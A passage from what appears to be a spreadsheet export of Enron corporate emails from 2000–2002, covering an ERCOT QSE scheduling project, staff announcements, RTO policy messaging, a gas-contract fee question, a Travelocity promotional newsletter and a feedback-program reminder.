I just spoke with Mark Patterson at ERCOT (he is Enron's Client rep.)  He will speak with Richard Howard to confirm but he believes that if you only wish to send QSE to QSE trades that a WAN agreement and connection is not necessary.  We would simply send the XML file via the internet using the tool that ERCOT devised for this._x000D_
_x000D_
As for item 4 the answer is no.  The portal does not have the capability of attaching a file and sending it to ERCOT but the tool referenced above would have the same function using the digital certificates.  This would save the $10,000 WAN connectivity and test fee as well with ERCOT._x000D_
_x000D_
Doug wants a cost associated with being a full service QSE for a generator.  This would mean setting up the WAN for UBS and licensing the ESCA MOS and other tools.  Steve was working on this.  Do we have an estimate?  Off hand Lloyd believes about $750,000.00.  Also we would have to bring in system operations personnel as ERCOT requires 24hr coverage for this._x000D_
_x000D_
Regards,_x000D_
_x000D_
Smith L. Day_x000D_
Enron Power Marketing, Inc._x000D_
Ph. 713-853-4201_x000D_
Fax: 713-646-8272_x000D_
Pager: 877-306-9429_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Poston, David  _x000D_
Sent:	Wednesday, January 30, 2002 12:19 PM_x000D_
To:	Day, Smith L._x000D_
Subject:	RE: QSE project timeline_x000D_
_x000D_
As per our discussion._x000D_
_x000D_
Item 1.  Quick updates to the project plan_x000D_
_x000D_
 &lt;&lt; File: poston_ercot.mpp &gt;&gt; _x000D_
Item 2.  Example of another plan_x000D_
_x000D_
 &lt;&lt; File: Netco_unit_testing.mpp &gt;&gt; _x000D_
_x000D_
Item 3.  Question?  Is a thorough WAN setup and site survey required to submit QSE trade schedules_x000D_
Response:  Based on the reading we have completed so far, it looks like for standard XML template submission, you only need DIGITAL certificates and an internet connect.  The digital certificates are issued by ERCOT and can be installed on the desktop.  I will follow-up with Pat Most to confirm this assumption.  So, in summary the WAN stuff will hopefully not be required._x000D_
_x000D_
Item 4.  Confirmation of an assumption_x000D_
If we cannot complete the communication work required for ERCOT for initial scheduling (we are hoping we can), FSP will still provide an XML file output that can be uploaded through the ERCOT Portal.  Is this correct Smith?_x000D_
_x000D_
Thanks,  Poston _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Day, Smith L.  _x000D_
Sent:	Wednesday, January 30, 2002 1:31 PM_x000D_
To:	Poston, David_x000D_
Subject:	QSE project timeline_x000D_
_x000D_
_x000D_
 &lt;&lt; File: UBS ERCOT QSE.mpp &gt;&gt; _x000D_
Smith L. Day_x000D_
Enron Power Marketing, Inc._x000D_
Ph. 713-853-4201_x000D_
Fax: 713-646-8272_x000D_
Pager: 877-306-9429</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 02:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'yorleni.mendez@enron.com', 'marianne.boubaki@enron.com', 'lauren.goldblatt@enron.com', 'jennifer.zoch@enron.com', 'mac.mcclelland@enron.com', 'dorie.hitchcock@enron.com', 'suzanne.danz@enron.com', 'michael.rosen@enron.com', 'kathryn.corbally@enron.com', 'mark.fryburg@enron.com', 'erin.rice@enron.com', 'shelly.mansfield@enron.com', 'katy.lomax@enron.com', 'sharonda.stephens@enron.com', 'christie.patrick@enron.com', 'julie.green@enron.com', 'katrin.haux@enron.com', 'karen.denne@enron.com', 'rodney.reagor@enron.com', 'holly.bradford-nelson@enron.com', 'margaret.allen@enron.com', 'habiba.bayi@enron.com', 'kelly.kimberly@enron.com', 'ginger.dernehl@enron.com', 'peggy.mahoney@enron.com', 'carol.hensley@enron.com', 'dennis.vegas@enron.com', 'marie.hejka@enron.com', 'keith.miceli@enron.com', 'marge.nadasky@enron.com', 'tracy.ralston@enron.com', 'meredith.philipp@enron.com', 'laura.schwartz@enron.com', 'kathy.mcmahon@enron.com', 'johan.zaayman@enron.com', 'andrew.morrison@enron.com', 'jackie.gentle@enron.com', 'elizabeth.linnell@enron.com', 'mireya.olsen@enron.com', 'iona.maclean@enron.com', 'terry.pierce@enron.com', 'eva.hoeffelman@enron.com', 'paula.rieker@enron.com', 'kregg.arntson@enron.com', 'aroma.pannu@enron.com', 'scott.vonderheide@enron.com', 'jeannie.mandelker@enron.com', 'dave.schafer@enron.com', 'alma.martinez@enron.com', 'carrie.robert@enron.com', 'janell.avery@enron.com', 'mary.clark@enron.com', 'kathie.grabstald@enron.com', 'kimberly.nelson@enron.com', 'diane.bazelides@enron.com', 'terrie.james@enron.com', 'maureen.mcvicker@enron.com', 'henry.means@enron.com', 'michelle.vitrella@enron.com', 'eddie.sera@enron.com', 'vanessa.groscrand@enron.com', 'laura.pena@enron.com', 'kenneth.lay@enron.com', 'sarah.palmer@enron.com', 'fiona.grant@enron.com', 'tori.wells@enron.com', 'courtney.votaw@enron.com', 'cedric.burgher@enron.com', 'gina.taylor@enron.com', 'janet.johnson@enron.com', 'heather.alon@enron.com', 'courtney.childers@enron.com', 'oneika.mccarthy@enron.com', 'rosalee.fleming@enron.com', 'yvette.parker@enron.com', 'quincy.hicks@enron.com', 'jimmy.mogal@enron.com', 'eric.thode@enron.com', 'mark.koenig@enron.com', 'richard.shapiro@enron.com', 'carla.galvan@enron.com', 'steven.kean@enron.com', 'joannie.williamson@enron.com', 'sherri.sera@enron.com', 'brandon.rigney@enron.com', 'steven.moses@enron.com', 'john.ambler@enron.com', 'laura.valencia@enron.com', 'karen.moore@enron.com', 'james.steffes@enron.com', 'cindy.olson@enron.com', 'mark.palmer@enron.com', 'ann.schmidt@enron.com', 'katherine.brown@enron.com', 'stacy.walker@enron.com'})</t>
  </si>
  <si>
    <t>Vance Meyer Joins Corporate PR Team</t>
  </si>
  <si>
    <t>I am pleased to announce that Vance Meyer joins the corporate public _x000D_
relations team today as director of media relations.  Vance comes to Enron _x000D_
from Connecticut-based The Stanley Works, where he worked for three years as _x000D_
director of communications and public affairs and was responsible for _x000D_
corporate media, community and government relations, employee communications _x000D_
and charitable contributions for the $2.8 billion tool company.  Prior to _x000D_
Stanley, Vance worked for General Electric for 12 years in several positions, _x000D_
both at the company's headquarters and at various field locations.  While at _x000D_
Stanley and GE, Vance developed strong media relations skills, working with _x000D_
key trade and mainstream business and finance publications.  At GE, Vance _x000D_
managed a Business Week cover story on Jack Welch, as well as cover stories _x000D_
in CIO and Chief Executive magazines.  _x000D_
_x000D_
Vance has a bachelor's degree in journalism from Ball State University in _x000D_
Indiana.  He and his wife, Theresa, and their 18-month-old son, Sam, are _x000D_
relocating to Houston._x000D_
_x000D_
Please join me in welcoming Vance to the PR team.</t>
  </si>
  <si>
    <t>Fri, 10 Mar 2000 08:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Vandy</t>
  </si>
  <si>
    <t xml:space="preserve">BRUTAL!_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Timothy Blanchard @ EES                           03/10/2000 04:48 PM_x000D_
	_x000D_
_x000D_
To: Brian Hoskins/HOU/ECT@ECT_x000D_
cc: Matthew Lenhart/HOU/ECT@ECT, Eric Bass/HOU/ECT@ECT, Chad _x000D_
Landry/HOU/ECT@ECT, Bryan Hull/HOU/ECT@ECT _x000D_
Subject: Vandy_x000D_
_x000D_
Nice try, now we get to kick your other team's ass tomorrow.  Maybe you call _x000D_
pull for Florida, I hear they're pretty good this year._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 07:19:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'pat.shortridge@enron.com', 'l..nicolay@enron.com', 'linda.robertson@enron.com', 'john.shelk@enron.com', 'meredith.philipp@enron.com', 'richard.shapiro@enron.com', 'pr &lt;.palmer@enron.com&gt;'})</t>
  </si>
  <si>
    <t>RE: RTO week follow up</t>
  </si>
  <si>
    <t>Great idea.  _x000D_
_x000D_
My key points would be that (a) FERC needs to push ahead with its "right sized" RTOs and (b) focus on standardizing the tariff and market design [no more collaborative efforts].  Two simple, easy to understand thoughts.  _x000D_
_x000D_
Also, I think that it's a mistake to use the term "large RTOs".  We don't want large RTOs.  We want RTOs that cover natural markets and benefit consumers._x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shortridge, Pat  _x000D_
Sent:	Friday, October 19, 2001 8:05 AM_x000D_
To:	Philipp, Meredith; Palmer, Mark A. (PR); Robertson, Linda; Shelk, John; Shapiro, Richard; Steffes, James D.; Novosel, Sarah_x000D_
Subject:	RTO week follow up_x000D_
_x000D_
In the aftermath of RTO week and following up on Rick's successful pre-briefings, we should be out spinning on the back end as well.  Perhaps Sarah, Meredith and I can come up with some thoughts on message points and send them around for comment.  Sound OK?</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 17:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'all.downtown@enron.com'})</t>
  </si>
  <si>
    <t>A Plausible Future for Power Generation</t>
  </si>
  <si>
    <t>Coming Full Circle: A Plausible Future for Power Generation_x000D_
_x000D_
Speaker:_x000D_
Amy Oberg_x000D_
Manager, Competitive Intelligence and Future Foresight_x000D_
Enron Energy Services_x000D_
_x000D_
Wednesday, May 30_x000D_
11:30 a.m. to 12:30 p.m._x000D_
EB 5C2_x000D_
_x000D_
_x000D_
To Make a Reservation, Call 3-1941 and Select Option 1._x000D_
_x000D_
Lunch will not be provided, but you are welcome to bring your own._x000D_
_x000D_
Please inform us ahead of time if you need special accommodations to _x000D_
participate in this meeting.  Call 3-9390.</t>
  </si>
  <si>
    <t>Wed, 14 Mar 2001 16:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>A new way to pay!</t>
  </si>
  <si>
    <t>Rick Causey recently announced a new online purchase and payment tool called _x000D_
iBuyit.  One of the special iBuyit components is an automated accounts _x000D_
payable feature that will improve the way you code and approve invoices. _x000D_
_x000D_
As of May 1, you will be able to access iBuyit Payables and_x000D_
? choose budget codes from simple drop down menus_x000D_
? receive e-mail when you have an invoice that needs to be coded and/or _x000D_
approved; and_x000D_
? view an electronic image of the actual invoice_x000D_
_x000D_
These improvements will help you assign codes more accurately and will reduce _x000D_
the time you spend processing invoices for payment.  The AP tool will also _x000D_
begin to eliminate the need for coding sheets or other paper information _x000D_
currently in use.  _x000D_
_x000D_
This tool will provide us the opportunity to transition our Houston-based AP _x000D_
processing functions to a third party, SourceNet Solutions.  This transition _x000D_
is expected to be completed by August 2001._x000D_
_x000D_
You will hear more about the iBuyit initiative, features of the AP tool and _x000D_
training opportunities in the coming weeks.  Please contact your AP _x000D_
representative if you have any questions.</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 19:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hunter.shively@enron.com', 'louise.kitchen@enron.com', 'kevin.presto@enron.com', 'tim.belden@enron.com'})</t>
  </si>
  <si>
    <t>FW: modified version</t>
  </si>
  <si>
    <t xml:space="preserve">This may be of interest to you.  I was contacted by Steve Lake from Argonne National Laboratory who  is interested in selling us some of their models and mapping software.  Let me know if there is any interest._x000D_
_x000D_
Thanks,_x000D_
Beth_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Lake, Stephan" &lt;slake@anl.gov&gt;@ENRON [mailto:IMCEANOTES-+22Lake+2C+20Stephan+22+20+3Cslake+40anl+2Egov+3E+40ENRON@ENRON.com] _x000D_
Sent:	Wednesday, April 04, 2001 3:52 PM_x000D_
To:	Perlman, Beth_x000D_
Cc:	Conzelmann, Guenter_x000D_
Subject:	FW: modified version_x000D_
_x000D_
_x000D_
Beth,_x000D_
 _x000D_
I  enjoyed talking with you this afternoon regarding possible Enron/Argonne  National Laboratory collaboration. As I mentioned, one of our  divisions, Decision Information Sciences has built state of the art tools  for modeling and simulating energy use. They have trained many country  energy ministries on the use of their tools as well as solved complex energy  technology issues._x000D_
 _x000D_
I've  attached a presentation which describes some of their capabilities in this area.  Decision Information Sciences also has done much work in studying critical  infrastructure issues in both gas and electric systems which also may be of  interest. Finally, they have been pioneers in the development of agent  based complex adaptive systems for modeling very complex systems that  are impossible to view with over approaches._x000D_
 _x000D_
I will also include a copy of my  correspondences with one of your e-business groups under separate  transmission._x000D_
 _x000D_
Regards,_x000D_
 _x000D_
Stephan Lake_x000D_
Manager, Business Development and  Marketing_x000D_
Argonne National Laboratory_x000D_
630-252-5685 telephone_x000D_
630-252-5230 fax_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Conzelmann, Guenter  _x000D_
Sent: Monday, April 02, 2001 4:50 PM_x000D_
To: Lake,  Stephan_x000D_
Subject: modified version_x000D_
 _x000D_
Guenter  Conzelmann_x000D_
Manager, National and International Studies  Section_x000D_
Energy and  Environmental Systems Analysis Group_x000D_
Argonne National  Laboratory_x000D_
9700 South Cass  Avenue_x000D_
Building 900_x000D_
Argonne, IL 60439-4832_x000D_
Telephone:   ++1-630-252-7173_x000D_
Fax:  ++1-630-252-6073_x000D_
email:   guenter@anl.gov _x000D_
Web:   http://enpep.dis.anl.gov/enpep/ _x000D_
 _x000D_
FedEx/DHL Address:_x000D_
1200 International Parkway_x000D_
Woodridge, IL 60517_x000D_
 _x000D_
 - enpep overview industrial partnership 02 lake.ppt </t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 10:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Rate for Tenaska Deal</t>
  </si>
  <si>
    <t xml:space="preserve">Consumer Price Index_x000D_
_x000D_
_x000D_
From: Sandi M Braband on 10/16/2000 12:14 PM_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Rate for Tenaska Deal  _x000D_
_x000D_
Daren,_x000D_
Thanks--while I'm certain I should know, I must confess that i do not know _x000D_
what CPI stands for???_x000D_
_x000D_
Sandi_x000D_
_x000D_
_x000D_
_x000D_
	Daren J Farmer_x000D_
	10/16/2000 11:39 AM_x000D_
		_x000D_
		 To: Sandi M Braband/HOU/ECT@ECT, Bob M Hall/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Re: Rate for Tenaska Deal_x000D_
_x000D_
Sandi, _x000D_
_x000D_
Sorry for just now getting back with you.  I was out last week.  _x000D_
_x000D_
The rate ($.04/mmbtu) will be charged on the greater of the volumes nominated _x000D_
on the supply contracts or the actual deliveries to the plant.  The fee will _x000D_
be adjusted yearly based on CPI._x000D_
_x000D_
Bob - I could not remember if we stated the type of settlement on the _x000D_
delivered volumes (actuals or nominations).  I think we should use actuals _x000D_
due to possibility that the plant could over pull with out our knowledge on a _x000D_
daily basis.  We would receive the estimates/actuals on a lag and may have to _x000D_
purchase gas to offset the imbalance, even though the plant kept the noms at _x000D_
the 45,000 base.  I also think that if the plant does increase the nom, they _x000D_
are more likely to pull the additional volume rather than pulling less.  Do _x000D_
you agree with this?_x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
From: Sandi M Braband on 10/10/2000 03:41 PM_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Rate for  Tenaska Deal_x000D_
_x000D_
Daren,_x000D_
When we met regarding the rate for the Tenaska Gas Management Agreement, you _x000D_
guys mentioned that it would be tied to an index--could you restate for me _x000D_
how that is to work--it will start out 4 cents per MMBTU based on the greater _x000D_
of the volumes nominated through the supply contracts or the actual _x000D_
deliveries to the plant. Then the fee will vary month to month? year to year? _x000D_
based on what index?_x000D_
_x000D_
Thanks,_x000D_
Sandi _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 17:43:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>Real Deals from Travelocity - Fare Sale Alert</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Peter,_x000D_
It's the American Airlines Fare Sale we have all been waiting for! _x000D_
Today we received word that American has announced a fare sale that _x000D_
extends to travel taken through the end of March 2002. If you have _x000D_
been holding off on making your holiday travel arrangements, there's _x000D_
no need to wait any longer. We hope you discover your next exciting _x000D_
travel opportunity in this issue of Real Deals! Fare Sale Details _x000D_
and Sample Fares . _x000D_
Featured This Week_x000D_
- Where's Everyone Going? _x000D_
- Save up to $75 on Airline Tickets! _x000D_
- $25 Off Last Minute Deals! _x000D_
- Earn Free Travel! _x000D_
Air _x000D_
- Free Stopovers from America West! _x000D_
- American Airlines's Senior's Companion Pass Offer! _x000D_
- JetBlue Offers Great Fares and So Much More! _x000D_
- Fantastic Fares to South America From Lan Chile! _x000D_
- Air Canada's Autumn Seat Sale! _x000D_
Cruises_x000D_
- 4-Night Bahamas Cruise from $149! _x000D_
- Short Mexico Cruises from $199! _x000D_
- 7-Night East/West Caribbean Sailings from $399! _x000D_
- 7-Night Southern Caribbean Cruise from $399! _x000D_
Vacations_x000D_
- Hawaii! 4th Night FREE &amp; MORE! _x000D_
- Amazing Las Vegas from $30! _x000D_
- Ski and Earn 25,000 AAdvantage Miles! _x000D_
- Sea &amp; Summit Sale from $790 with air! _x000D_
Hotels_x000D_
- Visit San Francisco from $129.95 a Night! _x000D_
- Enjoy Weekend Rates from $49-$179! _x000D_
- $225 per Night at The Orchid! _x000D_
- Econo Lodge_x000D_
 and Rodeway Inn_x000D_
! _x000D_
Cars_x000D_
- Great Weekly Rates from Alamo! _x000D_
Exclusive Offers_x000D_
- Book a Trip to Win a Trip! _x000D_
- Free Companion Ticket with Qantas! _x000D_
- Do You Love New York? We Do! _x000D_
Special Offers_x000D_
- $100 Savings in the Bahamas! _x000D_
Deals and Rewards_x000D_
- $25 Cash Rebate with Best Western! _x000D_
Fare Watcher _x000D_
Traveler Reviews _x000D_
Travelocity Store _x000D_
***FARE WATCHER***Fare Watcher _x000D_
Keep track of changes in airfares to your favorite cities with Fare _x000D_
Watcher! Tell us the cities you're interested in, how long you want _x000D_
to track them, and how you want to be notified. Fare Watcher  will do _x000D_
the rest! _x000D_
***TRAVELER REVIEWS***Traveler Reviews _x000D_
Now is your chance to tell us what you think! Travelocity is giving _x000D_
a free tote bag to the first 500 people who submit a Traveler Review. _x000D_
Fantastic cruise or disappointing resort? Tell us about it! Click _x000D_
here  to write your review. It's our way of saying thank you for _x000D_
your feedback. Travelocity Store Shop now  at the Travelocity Store for great savings on Lewis N. Clark _x000D_
travel accessories. Find document organizers, waist packs, toiletry _x000D_
kits, and much more on sale. The Travelocity Store  is your one-stop _x000D_
for great prices on luggage and accessories that make any trip more _x000D_
comfortable and enjoyable! _x000D_
***FEATURED THIS WEEK***Where's Everyone Going? _x000D_
We invite you to join other Travelocity members in sharing your plans _x000D_
and thoughts on traveling. Tell us  what's on your mind by taking our _x000D_
Winter Holiday Member Poll. Catch the results in our next issue of _x000D_
Real Deals! Save up to $75 on Airline Tickets! _x000D_
Save $20, $25, or even $30 on flights booked at Travelocity.com when _x000D_
you join the Travelocity Preferred Traveler Program today. That's a _x000D_
total of $75 in savings. Start saving on your next trip. Join now . $25 Off Last Minute Deals! Sign up  for our Easy Escapes e-mail and save $25 on Last Minute Deals! _x000D_
Looking for historic villages? Beaches? Bustling cities? Last Minute _x000D_
Deals will get you there this weekend or next for less! Easy Escapes _x000D_
will keep you informed about the great Last Minute Deals departing _x000D_
from your city. Earn Free Travel with Travelocity MasterCard! _x000D_
Earn Travelocity Rewards with each dollar you spend on the Travelocity _x000D_
MasterCard. With as few as 8,000 points, you'll be on your way to _x000D_
enjoying discounts and free travel. You'll earn $100 for every 8,000 _x000D_
points, which can be used towards bookings on Travelocity.com. Apply _x000D_
today  and earn 4,000 bonus points with your first transaction. _x000D_
***AIR*** Free Stopovers from America West! _x000D_
America West is allowing you to combine a quick getaway of up to _x000D_
five days in Phoenix, Las Vegas, or Columbus with your next trip. _x000D_
Now through January 15, 2002, receive a free stopover in one of _x000D_
these great cities. Click here  for details. American Airlines Offers Senior's Companion Pass Deals! _x000D_
American Airlines has a great travel program for seniors 62 years or _x000D_
older that allows you to bring along a traveling companion. So now you _x000D_
can take your grandchild or any other companion of your choice on a _x000D_
trip that they will remember for the rest of their life. Click here _x000D_
for details. Coast to Coast From $129 One-Way on JetBlue! _x000D_
Fly the airline that's got it all, from state-of-the-art aircraft to _x000D_
leather seats, DIRECTV_x000D_
, and more. Best of all, flying JetBlue is _x000D_
affordable, with coast-to-coast fares starting at just $129 one-way. Book your flight today! LanChile Puts South America Within Reach! _x000D_
Argentina, Chile, Peru...all these destinations and more await you _x000D_
with LanChile's fall sale. Purchase  your ticket by November 1, 2001, _x000D_
and you can take advantage of fantastic low fares to South America. Make your Plans to Fly Air Canada During their Autumn Seat Sale! _x000D_
Get great fares for travel this fall and winter, all over North _x000D_
America and the world from Air Canada. Hurry, to take advantage _x000D_
of these fares, you must book by October 30, 2001! Click here _x000D_
for details. _x000D_
***CRUISES***Quick Bahamas and Caribbean Cruises from $149! _x000D_
Short on time, but long on relaxation, these 3- and 4-night sailings _x000D_
are tailor-made to rejuvenate your spirit--without breaking the bank! _x000D_
Now is the time to discover unsurpassed tranquility on one of _x000D_
Norwegian's fabulous fall cruises to the tropics. Book now! Sail to Baja or the Mexican Riviera from $199! _x000D_
Wishing summer would linger a little longer? Let the warmth of the _x000D_
season live on with a 3-, 4-, or 7-night cruise to Baja or the Mexican _x000D_
Riviera. Carnival sails south of the border to some of the hottest _x000D_
destinations around. So don't miss the boat. Book now! 7-Night East/West Caribbean Cruises from $399! _x000D_
Unbelievably low rates and convenient departures from Fort Lauderdale, _x000D_
Miami, and Tampa are now being offered by Celebrity Cruises! St. _x000D_
Thomas, Grand Cayman, Cozumel, and other exotic ports await your _x000D_
arrival. All this and luxurious accommodations for $399? Believe it! Book now! 7-Night Southern Caribbean Cruise from $399! _x000D_
The Southern Caribbean comes alive like never before this fall and _x000D_
winter. With two dazzling new ships in its fleet, Royal Caribbean _x000D_
takes the at-sea experience to new heights. Rejuvenate your _x000D_
spirit--without breaking the bank! Enjoy it all for seven nights _x000D_
from as low as $399. Book now! More Cruise Deals _x000D_
***VACATIONS***Hawaii! 4th Night FREE &amp; MORE! _x000D_
Slip away to Hawaiian paradise  and unwind with one of these fabulous _x000D_
Travelocity Vacations deals to Maui or Oahu! Bookings must be made by _x000D_
November 2, 2001. Amazing Las Vegas from $30! _x000D_
Looking for some hot stuff? Head to Las Vegas and see what's cookin' _x000D_
in the entertainment capital of the world! Simply book  a Travelocity _x000D_
Vacations package by October 31, 2001. Ski Your Way to 25,000 AAdvantage Bonus Miles! _x000D_
Head for a ski adventure in Colorado! Now you can earn AAdvantage _x000D_
bonus miles when you book an American Airlines Vacations ski package. _x000D_
Simply book  by November 30, 2001. Sea &amp; Summit Sale! Club Med from $790 with Airfare! _x000D_
Reserve an exhilarating break at the beach or on the slopes, at _x000D_
limited-time sale prices. From Cancun to Copper Mountain, Club Med  is _x000D_
ready to lift your spirits with all-inclusive, sports-inclusive, _x000D_
food-and-fun-and-friendship-inclusive 7-night vacations! Call _x000D_
1-888-773-0012 and mention "SUMSUN". Offer ends November 10, 2001. More Vacation Deals _x000D_
***HOTELS***Visit San Francisco from $129.95 a Night! _x000D_
Head to the City by the Bay and get a fabulous deal on lodging! Now _x000D_
through November 30, 2001 you can enjoy the Westin St. Francis on _x000D_
Union Square for as low as $129.95 a night. Click here  for details. Enjoy Weekend Rates from $49-$179! _x000D_
Stay at Westin, Sheraton, Four Points by Sheraton, St. Regis, Luxury _x000D_
Collection, and W Hotels and take advantage of $49-$179 weekend rates _x000D_
and savings of up to 40 percent on weekday rates from now until _x000D_
January 27, 2002. Book today! $225 per Night at The Orchid at Mauna Lani! _x000D_
A tropical paradise  on Hawaii's Kohala Coast with spa, tennis, golf, _x000D_
beach, pool, and more! Escape-package room rate starts at $225 per _x000D_
night and includes daily breakfast for two! Book today! Econo Lodge_x000D_
 and Rodeway Inn_x000D_
! _x000D_
Each night's stay means a stamp on your EA$Y CHOICESM card. Six stamps _x000D_
equal a $25 credit or 750 airline miles. Ten stamps equal a $50 credit _x000D_
or 1,500 airline miles. Conditions apply. Click here . _x000D_
***CAR***Alamo Offers Compacts for $109 per Week! _x000D_
If you want great weekly rates on compact, SUVs, or premium cars, click here!  Hurry these offers end November 15, 2001. _x000D_
***EXCLUSIVE OFFERS***Win a Trip to Hawaii or the Caribbean! _x000D_
How wonderful are vacations? Why not take two?! Book a vacation or _x000D_
cruise  on Travelocity with your MasterCard and be automatically _x000D_
entered to win a trip of your choice to either Hawaii or the _x000D_
Caribbean! This sweepstakes is brought to you by Symantec. Book and _x000D_
Enter today! Free Companion Ticket with Qantas! _x000D_
Explore the wonders of Australia this fall and bring a friend for FREE _x000D_
when you join the Travelocity Preferred Traveler Program today. Best _x000D_
of all, you can stop over at up to three destinations, including _x000D_
Sydney, Brisbane, Melbourne, and more. This offer is good for a _x000D_
limited time. Restrictions apply. Join now . Win a Trip to New York and Show Your Support! _x000D_
To show our support for New York, Travelocity.com has teamed up with _x000D_
NYC &amp; Company--the Convention and Visitors Bureau, Broadway.com, _x000D_
Woodbury Common Premium Outlets, iSeatz.com, Viator, and Hotel _x000D_
Reservations Network to give away a trip for two to New York City _x000D_
during December 2001! _x000D_
***SPECIAL OFFERS***$100 Savings at Our Lucaya Beach &amp; Golf Resort! _x000D_
MasterCard has teamed up with Our Lucaya Beach &amp; Golf Resort , the _x000D_
newest resort in the Bahamas, to offer $100 savings and more per _x000D_
night, per room! Use your MasterCard card to book your dream vacation _x000D_
today  and save! _x000D_
***DEALS AND REWARDS***Receive a $25 Cash Rebate with Best Western! _x000D_
Do you need a vacation getaway this fall? From now through November _x000D_
18, Travelocity Preferred Traveler members will receive a $25 cash _x000D_
rebate on two-night stays at any Best Western Hotel. Members also _x000D_
receive $75 in cash rebate coupons on airline tickets, $15 off Hertz _x000D_
weekly rentals, and more. Join now . _x000D_
********* NEWS FROM OUR SPONSORS **********Free Caribbean Planner! _x000D_
Order your FREE Caribbean Vacation Planner, a 176-page comprehensive _x000D_
guide to 33 Caribbean destinations. It also includes information on _x000D_
sights and attractions, sporting activities, food, festivals, and a _x000D_
calendar of events. Do it Caribbean! Click here! Fall in Love with Switzerland! _x000D_
Some people say that fall is Switzerland's most beautiful season. _x000D_
A brilliant symphony of color and senses, a masterpiece offered by _x000D_
nature as if it were made for an unforgettable stay. Click here _x000D_
for more. _x000D_
Happy Travels! _x000D_
The Travelocity.com Team _x000D_
Go Virtually Anywhere! www.travelocity.com _x000D_
UNSUBSCRIBE _x000D_
When you registered at Travelocity or Preview Travel, you agreed to _x000D_
receive e-mail. If you would like to change your subscription _x000D_
preferences or if you received this message in error, please _x000D_
click below: http://travelocity1.m0.net/m/u/tty/t2.asp?e=PKEAVEY%40ect.enron.com _x000D_
FORGOT YOUR PASSWORD? _x000D_
Password look-up--follow this link and we'll help you retrieve _x000D_
your password: http://travelocity1.m0.net/m/s.asp?HB4610986039X815302X81359X _x000D_
HOW DO I UPDATE MY E-MAIL? _x000D_
You may update your e-mail address within Your Account Preferences. _x000D_
Simply click on "Your Account " at the top of the home page and log in. http://travelocity1.m0.net/m/s.asp?HB4610986039X815303X81359X _x000D_
*Fares shown are for one adult and are subject to additional charges, _x000D_
including, but not limited to, Passenger Facility Charges (ranging _x000D_
from $2-$18), Federal Segment Fees of $2.75 per segment (defined as a _x000D_
takeoff and a landing), and taxes/fees associated with international _x000D_
itineraries up to $113. Fuel surcharges, if applicable, are included _x000D_
in the fares listed. _x000D_
Total fare per passenger, including all charges, will always be _x000D_
displayed to you prior to final ticket purchase. Please note that _x000D_
fares are subject to restrictions, may not be available on all _x000D_
flights, and may change without notice. For detailed descriptions _x000D_
of the fare rules, click on the corresponding rules link._x000D_
Travelocity_x000D_
 and Travelocity.com are trademarks of Travelocity.com LP _x000D_
and Sabre_x000D_
 is a trademark of an affiliate of Sabre Inc. ? 2001 _x000D_
Travelocity.com LP. All rights reserved. WB/WS _x000D_
#280 CST#2050374-40 _x000D_
 </t>
  </si>
  <si>
    <t>Tue, 5 Sep 2000 06:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Receipt of Team Selection Form - Executive Impact &amp; Influence_x000D_
 Program</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip K Allen/HOU/ECT on 09/05/2000 _x000D_
01:50 PM ---------------------------_x000D_
_x000D_
_x000D_
"Christi Smith" &lt;christi.smith@lrinet.com&gt; on 09/05/2000 11:40:59 AM_x000D_
Please respond to &lt;christi.smith@lrinet.com&gt;_x000D_
To: &lt;Phillip.K.Allen@enron.com&gt;_x000D_
cc: "Debbie Nowak (E-mail)" &lt;dnowak@enron.com&gt; _x000D_
Subject: RE: Receipt of Team Selection Form - Executive Impact &amp; Influence _x000D_
Program_x000D_
_x000D_
_x000D_
We have not received your completed Team Selection information.  It is_x000D_
imperative that we receive your team's information (email, phone number,_x000D_
office) asap.  We cannot start your administration without this information,_x000D_
and your raters will have less time to provide feedback for you._x000D_
_x000D_
Thank you for your assistance._x000D_
_x000D_
Christi_x000D_
_x000D_
-----Original Message-----_x000D_
From: Christi Smith [mailto:christi.smith@lrinet.com]_x000D_
Sent: Thursday, August 31, 2000 10:33 AM_x000D_
To: 'Phillip.K.Allen@enron.com'_x000D_
Cc: Debbie Nowak (E-mail); Deborah Evans (E-mail)_x000D_
Subject: Receipt of Team Selection Form - Executive Impact &amp; Influence_x000D_
Program_x000D_
Importance: High_x000D_
_x000D_
_x000D_
Hi Phillip.  We appreciate your prompt attention and completing the Team_x000D_
Selection information._x000D_
_x000D_
Ideally, we needed to receive your team of raters on the Team Selection form_x000D_
we sent you.  The information needed is then easily transferred into the_x000D_
database directly from that Excel spreadsheet.  If you do not have the_x000D_
ability to complete that form, inserting what you listed below, we still_x000D_
require additional information._x000D_
_x000D_
We need each person's email address.  Without the email address, we cannot_x000D_
email them their internet link and ID to provide feedback for you, nor can_x000D_
